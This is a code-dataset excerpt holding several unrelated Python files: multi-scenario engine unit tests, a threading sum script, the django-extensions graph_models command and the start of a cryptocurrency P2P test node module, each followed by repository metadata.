self.assertDictEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.x_dict'), {'scenario_1': 2, 'scenario_2': 4})
self.assertListEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_list'), ['scenario_1', 'scenario_2'])
self.assertDictEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict'), {'scenario_1': {'x': 2}, 'scenario_2': {'x': 4}})
self.assertListEqual(
list(self.exec_eng.dm.get_disciplines_with_name(
f'{self.study_name}')[0].get_sosdisc_outputs().keys()),
['residuals_history'])
elif isinstance(disc, SoSScatterData):
self.assertListEqual(
[key for key in list(disc.get_data_io_dict('in').keys())if key not in disc.NUM_DESC_IN], ['x_dict', 'scenario_list'])
self.assertListEqual(
list(disc.get_data_io_dict('out').keys()), ['scenario_1.x', 'scenario_2.x'])
self.assertDictEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.x_dict'), {'scenario_1': 2, 'scenario_2': 4})
self.assertEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_1.x'), 2)
self.assertEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_2.x'), 4)
def test_04_dump_and_load_after_execute(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
x1 = 2
x2 = 4
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'x': 'float'}
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
dict_values[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.execute()
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2)
dump_dir = join(self.root_dir, self.namespace)
BaseStudyManager.static_dump_data(
dump_dir, self.exec_eng, DirectLoadDump())
exec_eng2 = ExecutionEngine(self.namespace)
builders = exec_eng2.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
exec_eng2.factory.set_builders_to_coupling_builder(builders)
exec_eng2.configure()
BaseStudyManager.static_load_data(
dump_dir, exec_eng2, DirectLoadDump())
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2)
# Clean the dump folder at the end of the test
self.dirs_to_del.append(
join(self.root_dir, self.namespace))
def test_05_several_trade_variables(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
x1 = 2
x2 = 4
x3 = 0
x4 = 3
scenario_df = pd.DataFrame(
[['scenario_1', x1, x3], ['scenario_2', x1, x4], ['scenario_3', x2, x3]], columns=['scenario_name', 'name_1.x', 'name_2.x'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_1.x': 'float', 'name_2.x': 'float'}
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
scenario_list = ['scenario_1', 'scenario_2',
'scenario_3']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.exec_eng.execute()
scenario_dict = {'scenario_1': {'name_1.x': x1, 'name_2.x': x3},
'scenario_2': {'name_1.x': x1, 'name_2.x': x4},
'scenario_3': {'name_1.x': x2, 'name_2.x': x3}}
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_dict'), scenario_dict)
self.assertDictEqual(self.exec_eng.dm.get_value('MyCase.multi_scenarios.name_1.x_dict'), {
'scenario_1': x1, 'scenario_2': x1, 'scenario_3': x2})
self.assertDictEqual(self.exec_eng.dm.get_value('MyCase.multi_scenarios.name_2.x_dict'), {
'scenario_1': x3, 'scenario_2': x4, 'scenario_3': x3})
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x3 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x4 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_3.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_3.name_2.y'), a2 * x3 + b2)
def test_06_trade_on_name_list(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
scenario_df = pd.DataFrame(
[['scenario_A', ['name_1']], ['scenario_B', ['name_1', 'name_2']], ['scenario_C', ['name_1', 'name_2', 'name_3']]], columns=['scenario_name', 'name_list'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_list': 'string_list'}
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
scenario_list = ['scenario_A', 'scenario_B',
'scenario_C']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
a3 = 10
b3 = 0
x = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.name_3.a'] = a3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
dict_values[self.study_name +
'.multi_scenarios.scenario_A.Disc1.name_1.b'] = b1
dict_values[self.study_name +
'.multi_scenarios.scenario_B.Disc1.name_1.b'] = b1
dict_values[self.study_name +
'.multi_scenarios.scenario_B.Disc1.name_2.b'] = b2
dict_values[self.study_name +
'.multi_scenarios.scenario_C.Disc1.name_1.b'] = b1
dict_values[self.study_name +
'.multi_scenarios.scenario_C.Disc1.name_2.b'] = b2
dict_values[self.study_name +
'.multi_scenarios.scenario_C.Disc1.name_3.b'] = b3
dict_values[self.study_name + '.name_1.x'] = x
dict_values[self.study_name + '.name_2.x'] = x
dict_values[self.study_name + '.name_3.x'] = x
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = {'scenario_A': {'name_list': ['name_1']},
'scenario_B': {'name_list': ['name_1', 'name_2']},
'scenario_C': {'name_list': ['name_1', 'name_2', 'name_3']}}
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_dict'), scenario_dict)
dict_values[f'{self.study_name}.multi_scenarios.name_list_list'] = [
['name_1', 'name_2'], ['name_1', 'name_2', 'name_3']]
dict_values[self.study_name +
'.multi_scenarios.scenario_A.Disc1.name_2.b'] = b2
dict_values[self.study_name +
'.multi_scenarios.scenario_B.Disc1.name_3.b'] = b3
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.exec_eng.execute()
y1 = a1 * x + b1
y2 = a2 * x + b2
y3 = a3 * x + b3
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_A.y_dict'), {'name_1': y1})
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_B.y_dict'), {'name_1': y1, 'name_2': y2})
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_C.y_dict'), {'name_1': y1, 'name_2': y2, 'name_3': y3})
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.y_dict'), {'scenario_A.name_1': y1,
'scenario_B.name_1': y1,
'scenario_B.name_2': y2,
'scenario_C.name_1': y1,
'scenario_C.name_2': y2,
'scenario_C.name_3': y3})
def test_07_simple_multi_scenarios_without_trade_variables(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
scenario_df = pd.DataFrame(
[['scenario_A'], ['scenario_B'], ['scenario_C']], columns=['scenario_name'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
scenario_list = ['scenario_A', 'scenario_B',
'scenario_C']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
x = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
dict_values[self.study_name +
f'.multi_scenarios.{scenario}.Disc1.name_1.b'] = b1
dict_values[self.study_name +
f'.multi_scenarios.{scenario}.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.name_1.x'] = x
dict_values[self.study_name + '.name_2.x'] = x
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.trade_variables'), {})
self.assertListEqual(
self.exec_eng.dm.get_all_namespaces_from_var_name('scenario_dict'), [])
def test_08_changing_trade_variables(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_1.x': 'float', 'name_2.x': 'float'}
self.exec_eng.load_study_from_input_dict(dict_values)
scenario_df = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_df')
self.assertTrue(scenario_df.equals(pd.DataFrame(
columns=['scenario_name', 'name_1.x', 'name_2.x'])))
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_list': 'string_list'}
self.exec_eng.load_study_from_input_dict(dict_values)
scenario_df = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_df')
self.assertTrue(scenario_df.equals(pd.DataFrame(
columns=['scenario_name', 'name_list'])))
scenario_df = pd.DataFrame([['scenario_1', ['name_1', 'name_2']], [
'scenario_2', ['name_3']]], columns=['scenario_name', 'name_list'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict')
self.assertDictEqual(scenario_dict, {'scenario_1': {'name_list': [
'name_1', 'name_2']}, 'scenario_2': {'name_list': ['name_3']}})
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_list': 'string_list', 'name_1.x': 'float', 'name_2.x': 'float'}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict')
self.assertDictEqual(scenario_dict, {'scenario_1': {'name_list': ['name_1', 'name_2'], 'name_1.x': np.nan, 'name_2.x': np.nan}, 'scenario_2': {
'name_list': ['name_3'], 'name_1.x': np.nan, 'name_2.x': np.nan}})
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_1.x': 'float', 'name_2.x': 'float'}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict')
self.assertDictEqual(scenario_dict, {'scenario_1': {'name_1.x': np.nan, 'name_2.x': np.nan}, 'scenario_2': {
'name_1.x': np.nan, 'name_2.x': np.nan}})
x1 = 2
x2 = 4
x3 = 0
x4 = 3
scenario_df = pd.DataFrame(
[['scenario_1', x1, x3], ['scenario_2', x1, x4], ['scenario_3', x2, x3]], columns=['scenario_name', 'name_1.x', 'name_2.x'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
scenario_list = ['scenario_1', 'scenario_2',
'scenario_3']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = {'scenario_1': {'name_1.x': x1, 'name_2.x': x3},
'scenario_2': {'name_1.x': x1, 'name_2.x': x4},
'scenario_3': {'name_1.x': x2, 'name_2.x': x3}}
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_dict'), scenario_dict)
if '__main__' == __name__:
cls = TestSimpleMultiScenario()
cls.setUp()
cls.test_06_trade_on_name_list()
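    # Editorial note (sketch): the block above runs a single test for quick local
    # debugging and never calls tearDown(); the full class is normally run with
    # the standard runner instead, e.g. by replacing it with unittest.main().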
| 44.454446 | 180 | 0.602499 |
386eea48ae59488107d3b8bf92b860dbc71387be | 431 | py | Python | 20160507_4.py | JaeGyu/PythonEx_1 | e67053db6ca7431c3dd66351c190c53229e3f141 | [
"MIT"
] | null | null | null | 20160507_4.py | JaeGyu/PythonEx_1 | e67053db6ca7431c3dd66351c190c53229e3f141 | [
"MIT"
] | null | null | null | 20160507_4.py | JaeGyu/PythonEx_1 | e67053db6ca7431c3dd66351c190c53229e3f141 | [
"MIT"
] | null | null | null | #_*_ coding: utf-8 _*_
from threading import Thread
def do_work(start, end, result):
sum = 0
for i in range(start, end):
sum += i
result.append(sum)
return
if __name__ == "__main__":
START, END = 0, 20000000
result = list()
th1 = Thread(target=do_work, args=(START, END/2, result))
th2 = Thread(target=do_work, args=(END/2, END, result))
th1.start()
th2.start()
th1.join()
th2.join()
print "Result : ", sum(result) | 20.52381 | 58 | 0.663573 |
496878601bdbd8ab8bae6726cea8bbfc4d020ce6 | 12,021 | py | Python | django_extensions/management/commands/graph_models.py | kaozdl/django-extensions | bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36 | [
"MIT"
] | null | null | null | django_extensions/management/commands/graph_models.py | kaozdl/django-extensions | bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36 | [
"MIT"
] | null | null | null | django_extensions/management/commands/graph_models.py | kaozdl/django-extensions | bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
import json
import os
import tempfile
import six
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django_extensions.management.modelviz import ModelGraph, generate_dot
from django_extensions.management.utils import signalcommand
try:
import pygraphviz
HAS_PYGRAPHVIZ = True
except ImportError:
HAS_PYGRAPHVIZ = False
try:
try:
import pydotplus as pydot
except ImportError:
import pydot
HAS_PYDOT = True
except ImportError:
HAS_PYDOT = False
class Command(BaseCommand):
help = "Creates a GraphViz dot file for the specified app names. You can pass multiple app names and they will all be combined into a single model. Output is usually directed to a dot file."
can_import_settings = True
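    # Editorial sketch of typical invocations (app/file names are placeholders):
    #   ./manage.py graph_models -a -g -o all_models.png
    #   ./manage.py graph_models myapp otherapp --dot -o models.dot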
def __init__(self, *args, **kwargs):
"""
Allow defaults for arguments to be set in settings.GRAPH_MODELS.
Each argument in self.arguments is a dict where the key is the
space-separated args and the value is our kwarg dict.
The default from settings is keyed as the long arg name with '--'
removed and any '-' replaced by '_'. For example, the default value for
--disable-fields can be set in settings.GRAPH_MODELS['disable_fields'].
"""
self.arguments = {
'--pygraphviz': {
'action': 'store_true',
'default': False,
'dest': 'pygraphviz',
'help': 'Output graph data as image using PyGraphViz.',
},
'--pydot': {
'action': 'store_true',
'default': False,
'dest': 'pydot',
'help': 'Output graph data as image using PyDot(Plus).',
},
'--dot': {
'action': 'store_true',
'default': False,
'dest': 'dot',
'help': 'Output graph data as raw DOT (graph description language) text data.',
},
'--json': {
'action': 'store_true',
'default': False,
'dest': 'json',
'help': 'Output graph data as JSON',
},
'--disable-fields -d': {
'action': 'store_true',
'default': False,
'dest': 'disable_fields',
'help': 'Do not show the class member fields',
},
'--disable-abstract-fields': {
'action': 'store_true',
'default': False,
'dest': 'disable_abstract_fields',
'help': 'Do not show the class member fields that were inherited',
},
'--group-models -g': {
'action': 'store_true',
'default': False,
'dest': 'group_models',
'help': 'Group models together respective to their application',
},
'--all-applications -a': {
'action': 'store_true',
'default': False,
'dest': 'all_applications',
'help': 'Automatically include all applications from INSTALLED_APPS',
},
'--output -o': {
'action': 'store',
'dest': 'outputfile',
                'help': 'Render output file. The type of output depends on the file extension. Use png or jpg to render the graph to an image.',
},
'--layout -l': {
'action': 'store',
'dest': 'layout',
'default': 'dot',
'help': 'Layout to be used by GraphViz for visualization. Layouts: circo dot fdp neato nop nop1 nop2 twopi',
},
'--verbose-names -n': {
'action': 'store_true',
'default': False,
'dest': 'verbose_names',
'help': 'Use verbose_name of models and fields',
},
'--language -L': {
'action': 'store',
'dest': 'language',
'help': 'Specify language used for verbose_name localization',
},
'--exclude-columns -x': {
'action': 'store',
'dest': 'exclude_columns',
'help': 'Exclude specific column(s) from the graph. Can also load exclude list from file.',
},
'--exclude-models -X': {
'action': 'store',
'dest': 'exclude_models',
'help': 'Exclude specific model(s) from the graph. Can also load exclude list from file. Wildcards (*) are allowed.',
},
'--include-models -I': {
'action': 'store',
'dest': 'include_models',
'help': 'Restrict the graph to specified models. Wildcards (*) are allowed.',
},
'--inheritance -e': {
'action': 'store_true',
'default': True,
'dest': 'inheritance',
'help': 'Include inheritance arrows (default)',
},
'--no-inheritance -E': {
'action': 'store_false',
'default': False,
'dest': 'inheritance',
'help': 'Do not include inheritance arrows',
},
'--hide-relations-from-fields -R': {
'action': 'store_false',
'default': True,
'dest': 'relations_as_fields',
'help': 'Do not show relations as fields in the graph.',
},
'--disable-sort-fields -S': {
'action': 'store_false',
'default': True,
'dest': 'sort_fields',
'help': 'Do not sort fields',
},
}
defaults = getattr(settings, 'GRAPH_MODELS', None)
if defaults:
for argument in self.arguments:
arg_split = argument.split(' ')
setting_opt = arg_split[0].lstrip('-').replace('-', '_')
if setting_opt in defaults:
self.arguments[argument]['default'] = defaults[setting_opt]
super(Command, self).__init__(*args, **kwargs)
def add_arguments(self, parser):
"""Unpack self.arguments for parser.add_arguments."""
parser.add_argument('app_label', nargs='*')
for argument in self.arguments:
parser.add_argument(*argument.split(' '), **self.arguments[argument])
@signalcommand
def handle(self, *args, **options):
args = options['app_label']
if not args and not options['all_applications']:
raise CommandError("need one or more arguments for appname")
# determine output format based on options, file extension, and library
# availability
outputfile = options.get("outputfile") or ""
_, outputfile_ext = os.path.splitext(outputfile)
outputfile_ext = outputfile_ext.lower()
output_opts_names = ['pydot', 'pygraphviz', 'json', 'dot']
output_opts = {k: v for k, v in options.items() if k in output_opts_names}
output_opts_count = sum(output_opts.values())
if output_opts_count > 1:
raise CommandError("Only one of %s can be set." % ", ".join(["--%s" % opt for opt in output_opts_names]))
if output_opts_count == 1:
output = next(key for key, val in output_opts.items() if val)
elif not outputfile:
            # When neither an outputfile nor an output format option is set,
            # default to printing .dot format to stdout. Kept for backward
            # compatibility.
output = "dot"
elif outputfile_ext == ".dot":
output = "dot"
elif outputfile_ext == ".json":
output = "json"
elif HAS_PYGRAPHVIZ:
output = "pygraphviz"
elif HAS_PYDOT:
output = "pydot"
else:
raise CommandError("Neither pygraphviz nor pydotplus could be found to generate the image. To generate text output, use the --json or --dot options.")
# Consistency check: Abort if --pygraphviz or --pydot options are set
# but no outputfile is specified. Before 2.1.4 this silently fell back
        # to printing .dot format to stdout.
if output in ["pydot", "pygraphviz"] and not outputfile:
raise CommandError("An output file (--output) must be specified when --pydot or --pygraphviz are set.")
cli_options = ' '.join(sys.argv[2:])
graph_models = ModelGraph(args, cli_options=cli_options, **options)
graph_models.generate_graph_data()
if output == "json":
graph_data = graph_models.get_graph_data(as_json=True)
return self.render_output_json(graph_data, outputfile)
graph_data = graph_models.get_graph_data(as_json=False)
dotdata = generate_dot(graph_data)
if not six.PY3:
dotdata = dotdata.encode("utf-8")
if output == "pygraphviz":
return self.render_output_pygraphviz(dotdata, **options)
if output == "pydot":
return self.render_output_pydot(dotdata, **options)
self.print_output(dotdata, outputfile)
def print_output(self, dotdata, output_file=None):
"""Write model data to file or stdout in DOT (text) format."""
if six.PY3 and isinstance(dotdata, six.binary_type):
dotdata = dotdata.decode()
if output_file:
with open(output_file, 'wt') as dot_output_f:
dot_output_f.write(dotdata)
else:
self.stdout.write(dotdata)
def render_output_json(self, graph_data, output_file=None):
"""Write model data to file or stdout in JSON format."""
if output_file:
with open(output_file, 'wt') as json_output_f:
json.dump(graph_data, json_output_f)
else:
self.stdout.write(json.dumps(graph_data))
def render_output_pygraphviz(self, dotdata, **kwargs):
"""Render model data as image using pygraphviz"""
if not HAS_PYGRAPHVIZ:
raise CommandError("You need to install pygraphviz python module")
version = pygraphviz.__version__.rstrip("-svn")
try:
if tuple(int(v) for v in version.split('.')) < (0, 36):
# HACK around old/broken AGraph before version 0.36 (ubuntu ships with this old version)
tmpfile = tempfile.NamedTemporaryFile()
tmpfile.write(dotdata)
tmpfile.seek(0)
dotdata = tmpfile.name
except ValueError:
pass
graph = pygraphviz.AGraph(dotdata)
graph.layout(prog=kwargs['layout'])
graph.draw(kwargs['outputfile'])
def render_output_pydot(self, dotdata, **kwargs):
"""Render model data as image using pydot"""
if not HAS_PYDOT:
raise CommandError("You need to install pydot python module")
graph = pydot.graph_from_dot_data(dotdata)
if not graph:
raise CommandError("pydot returned an error")
if isinstance(graph, (list, tuple)):
if len(graph) > 1:
sys.stderr.write("Found more then one graph, rendering only the first one.\n")
graph = graph[0]
output_file = kwargs['outputfile']
formats = [
'bmp', 'canon', 'cmap', 'cmapx', 'cmapx_np', 'dot', 'dia', 'emf',
'em', 'fplus', 'eps', 'fig', 'gd', 'gd2', 'gif', 'gv', 'imap',
'imap_np', 'ismap', 'jpe', 'jpeg', 'jpg', 'metafile', 'pdf',
'pic', 'plain', 'plain-ext', 'png', 'pov', 'ps', 'ps2', 'svg',
'svgz', 'tif', 'tiff', 'tk', 'vml', 'vmlz', 'vrml', 'wbmp', 'xdot',
]
ext = output_file[output_file.rfind('.') + 1:]
format_ = ext if ext in formats else 'raw'
graph.write(output_file, format=format_)
| 40.338926 | 194 | 0.546294 |
fc464cc39c7a9db9cf3895c1311e7dabc8f105e9 | 39,124 | py | Python | qa/rpc-tests/test_framework/mininode.py | globalmovementclub/globalmovementclub | be5123a8e199cbe584963eedbe7e6f57e50374a1 | ["MIT"] | 1 | 2020-01-11T17:22:09.000Z | 2020-01-11T17:22:09.000Z | qa/rpc-tests/test_framework/mininode.py | grandmastercoin/grandmastercoin | be5123a8e199cbe584963eedbe7e6f57e50374a1 | ["MIT"] | 1 | 2020-09-24T02:21:29.000Z | 2020-09-24T02:21:29.000Z | qa/rpc-tests/test_framework/mininode.py | globalmovementclub/globalmovementclub | be5123a8e199cbe584963eedbe7e6f57e50374a1 | ["MIT"] | 1 | 2019-07-06T03:37:05.000Z | 2019-07-06T03:37:05.000Z |
# mininode.py - GlobalMovementClub P2P network half-a-node
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# This python code was modified from ArtForz' public domain half-a-node, as
# found in the mini-node branch of http://github.com/jgarzik/pynode.
#
# NodeConn: an object which manages p2p connectivity to a globalmovementclub node
# NodeConnCB: a base class that describes the interface for receiving
# callbacks with network messages from a NodeConn
# CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....:
# data structures that should map to corresponding structures in
# globalmovementclub/primitives
# msg_block, msg_tx, msg_headers, etc.:
# data structures that represent network messages
# ser_*, deser_*: functions that handle serialization/deserialization
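#
# A minimal usage sketch (illustrative only -- the address, the port and
# passing rpc=None are assumptions, not requirements of this module):
#   test_node = NodeConnCB()
#   conn = NodeConn('127.0.0.1', 18444, rpc=None, callback=test_node)
#   NetworkThread().start()      # run the asyncore loop in the background
#   test_node.wait_for_verack()  # handshake done, test logic can begin
#   conn.send_message(msg_ping(nonce=1))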
import struct
import socket
import asyncore
import time
import sys
import random
from binascii import hexlify, unhexlify
from io import BytesIO
from codecs import encode
import hashlib
from threading import RLock
from threading import Thread
import logging
import copy
import globalmovementclub_hash
BIP0031_VERSION = 60000
MY_VERSION = 70208 # current MIN_PEER_PROTO_VERSION
MY_SUBVERSION = b"/python-mininode-tester:0.0.2/"
MAX_INV_SZ = 50000
MAX_BLOCK_SIZE = 1000000
COIN = 100000000L # 1 btc in satoshis
# Keep our own socket map for asyncore, so that we can track disconnects
# ourselves (to workaround an issue with closing an asyncore socket when
# using select)
mininode_socket_map = dict()
# One lock for synchronizing all data access between the networking thread (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# NodeConn acquires this lock whenever delivering a message to to a NodeConnCB,
# and whenever adding anything to the send buffer (in send_message()). This
# lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the NodeConnCB or NodeConn.
mininode_lock = RLock()
# Serialization/deserialization tools
def sha256(s):
return hashlib.new('sha256', s).digest()
def hash256(s):
return sha256(sha256(s))
def globalmovementclubhash(s):
return globalmovementclub_hash.getPoWHash(s)
def deser_string(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
return f.read(nit)
def ser_string(s):
if len(s) < 253:
return struct.pack("B", len(s)) + s
elif len(s) < 0x10000:
return struct.pack("<BH", 253, len(s)) + s
elif len(s) < 0x100000000L:
return struct.pack("<BI", 254, len(s)) + s
return struct.pack("<BQ", 255, len(s)) + s
def deser_uint256(f):
r = 0L
for i in xrange(8):
t = struct.unpack("<I", f.read(4))[0]
r += t << (i * 32)
return r
def ser_uint256(u):
rs = b""
for i in xrange(8):
rs += struct.pack("<I", u & 0xFFFFFFFFL)
u >>= 32
return rs
def uint256_from_str(s):
r = 0L
t = struct.unpack("<IIIIIIII", s[:32])
for i in xrange(8):
r += t[i] << (i * 32)
return r
def uint256_from_compact(c):
nbytes = (c >> 24) & 0xFF
